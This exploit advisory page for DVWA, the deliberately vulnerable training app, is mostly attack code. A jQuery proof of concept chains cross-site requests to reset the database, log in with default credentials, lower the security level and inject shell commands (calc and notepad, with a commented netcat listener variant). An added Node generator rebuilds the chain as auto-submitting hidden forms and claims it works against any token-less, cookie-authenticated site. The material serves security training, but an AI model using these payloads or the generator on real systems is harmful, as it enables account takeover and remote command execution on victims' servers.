DVWA Cross Site Request Forgery

2014.09.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!--
There are multiple CSRF issues in DVWA. An attacker can chain them: first reset the
victim's DVWA database, then log the victim in with the default credentials that the
reset restores, then send another CSRF request that sets the security level to "low"
so that exploitation is reliable, and finally use the command-execution page to run a
command and possibly obtain a shell. :)
*This PoC opens the calculator as a demo execution in approximately 5 seconds.*
The attacker only needs to know that you are running DVWA for this to work.
Paulos Yibelo and Tabor N. Shiferaw 2014
-->
<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'></script>
<div id='loader'></div>
<script>
//document.getElementById("loader").innerHTML = 'Loading...';

// POST bodies for the four steps. Each one is exactly what the corresponding DVWA
// form submits when a logged-in user fills it in.
var one   = {"create_db": 'whatever'};
var two   = {"username": "admin", "password": "password", "Login": "Login"};
var three = {"security": "low", "seclev_submit": "Submit"};
// Windows: opens Notepad and the calculator; change this to whatever you desire
var four  = {"ip": "127.0.0.1 && notepad && calc", "submit": "submit"};
// Linux
//var four = {"ip": "127.0.0.1;netcat -l 15.11.11.x -p 4444", "submit": "submit"};

// The target lives on another origin, so the browser will not let this page read the
// responses (DVWA sends no CORS headers) and jQuery's "success" callback would never
// fire. The chain is therefore driven from "complete", which runs after every request
// whether or not the response could be read, and the victim's cookies are sent with
// xhrFields so the session created by the login in step 2 is used in steps 3 and 4.
var withCookies = { withCredentials: true };

/*
 * step 1
 * Reset the database
 */
function start_exploit() {
    $("#loader").html("Loading...");
    $.ajax({
        url: "http://localhost/dvwa/setup.php",
        type: "POST",
        data: one,
        xhrFields: withCookies,
        complete: function (x) { dvwaLogin(); }
    });
}

/*
 * step 2
 * Log in using the default password restored by the reset
 */
function dvwaLogin() {
    $.ajax({
        url: "http://localhost/dvwa/login.php",
        type: "POST",
        data: two,
        xhrFields: withCookies,
        complete: function (x) { levelChanger(); }
    });
}

/*
 * step 3
 * Set the security level to low
 */
function levelChanger() {
    $.ajax({
        url: "http://localhost/dvwa/security.php",
        type: "POST",
        data: three,
        xhrFields: withCookies,
        complete: function (x) { commandExecution(); }
    });
}

/*
 * step 4
 * Execute the command through the command-injection page
 */
function commandExecution() {
    $.ajax({
        url: "http://localhost/dvwa/vulnerabilities/exec/index.php",
        type: "POST",
        data: four,
        xhrFields: withCookies,
        complete: function (x) {
            //document.getElementById("loader").innerHTML = "Executed";
            $("#loader").text("Loaded");
        }
    });
}

start_exploit();
</script>
<!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->
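The XMLHttpRequest-based PoC above depends on the browser sending the victim's cookies on cross-origin requests, which current browsers no longer do by default for cookies without a SameSite attribute. The delivery technique that does not depend on CORS or on reading any response is a plain auto-submitting HTML form: form POSTs are never subject to CORS, and loading each response into a hidden iframe gives an onload event that triggers the next step. The generator below is an added example written for this page, not code from the original advisory or from DVWA; it reuses the four request bodies of the PoC and assumes the same http://localhost/dvwa install. Run it with Node to emit the attacker page.

```javascript
// Added example (not part of the original PoC): the same four-step chain delivered
// as auto-submitting HTML forms. Usage: node csrf_chain.js > chain.html
const TARGET = "http://localhost/dvwa"; // assumed, same as the PoC

// Same request bodies as the original PoC, in order.
const STEPS = [
  { path: "/setup.php", fields: { create_db: "whatever" } },
  { path: "/login.php", fields: { username: "admin", password: "password", Login: "Login" } },
  { path: "/security.php", fields: { security: "low", seclev_submit: "Submit" } },
  { path: "/vulnerabilities/exec/index.php", fields: { ip: "127.0.0.1 && notepad && calc", submit: "submit" } },
];

// Escape a value for a double-quoted HTML attribute. Without this the "&&" in the
// command payload, or any quote in a field, would corrupt the generated form.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// One hidden POST form per step, targeted at the sink iframe so the victim's
// browser sends its cookies and the page never has to read the response.
function buildForm(index, step) {
  const inputs = Object.entries(step.fields)
    .map(([k, v]) => `<input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join("\n    ");
  return `<form id="step${index}" method="POST" action="${escapeAttr(TARGET + step.path)}" target="sink">\n    ${inputs}\n  </form>`;
}

// The full attacker page: hidden iframe, the forms, and a driver that submits the
// next form each time the iframe finishes loading the previous response.
function buildChainPage(steps) {
  const forms = steps.map((s, i) => buildForm(i, s)).join("\n  ");
  return `<!DOCTYPE html>
<html><body>
  <iframe name="sink" id="sink" style="display:none"></iframe>
  ${forms}
  <script>
    var i = 0, total = ${steps.length}, pending = false;
    function submitNext() {
      if (i >= total) return;
      pending = true;
      document.getElementById("step" + i++).submit();
    }
    document.getElementById("sink").onload = function () {
      if (!pending) return;   // ignore the iframe's initial about:blank load
      pending = false;
      submitNext();
    };
    submitNext();
  <\/script>
</body></html>`;
}

if (typeof require !== "undefined" && require.main === module) {
  process.stdout.write(buildChainPage(STEPS));
}
if (typeof module !== "undefined") {
  module.exports = { escapeAttr, buildForm, buildChainPage, STEPS, TARGET };
}
```

Because nothing in the generated page reads a response, the chain works against any target that accepts cookie-authenticated form POSTs without a CSRF token; it still fails once the session cookie is SameSite=Lax or Strict, which is exactly the browser-side mitigation that makes the original XHR PoC stop working.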


Copyright 2024, cxsecurity.com